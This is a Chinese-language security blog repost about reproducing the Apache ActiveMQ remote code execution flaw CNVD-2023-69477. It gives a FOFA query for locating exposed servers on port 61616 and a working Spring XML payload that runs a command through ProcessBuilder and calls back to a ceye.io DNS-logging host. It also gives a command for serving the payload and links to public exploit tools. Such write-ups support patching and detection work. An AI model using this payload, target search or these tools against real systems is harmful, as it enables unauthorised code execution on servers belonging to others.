[漏洞复现] Apache ActiveMQ RCE CNVD-2023-69477

admin 2023年10月28日23:44:27评论181 views字数 1205阅读4分1秒阅读模式
漏洞描述:
ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。
Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。

影响版本:

5.18.0<=Apache ActiveMQ<5.18.3

5.17.0<=Apache ActiveMQ<5.17.6 

5.16.0<=Apache ActiveMQ<5.16.7 

5.15.0<=Apache ActiveMQ<5.15.15


fofa搜索语法:

app="APACHE-ActiveMQ" && port="61616"


漏洞复现:

将poc.xml上传到vps

dns平台:ceye.io

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">    <constructor-arg>      <list>        <value>ping</value>        <value>co44bq.ceye.io</value>      </list>    </constructor-arg>  </bean></beans>

使用python启动http服务

python3 -m http.server 8989

[漏洞复现] Apache ActiveMQ RCE CNVD-2023-69477

漏洞工具利用 https://github.com/X1r0z/ActiveMQ-RCE

[漏洞复现] Apache ActiveMQ RCE CNVD-2023-69477

dns平台也接收到请求

[漏洞复现] Apache ActiveMQ RCE CNVD-2023-69477

漏洞利用工具:

https://github.com/Fw-fW-fw/activemq_Throwable https://github.com/sincere9/Apache-ActiveMQ-RCE https://github.com/X1r0z/ActiveMQ-RCE

漏洞分析:

https://paper.seebug.org/3058/ https://mp.weixin.qq.com/s/4n7vyeXLtim0tXcjnSWDAw



原文始发于微信公众号(安全逐梦人):[漏洞复现] Apache ActiveMQ RCE CNVD-2023-69477

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月28日23:44:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [漏洞复现] Apache ActiveMQ RCE CNVD-2023-69477http://cn-sec.com/archives/2155440.html

发表评论

匿名网友 填写信息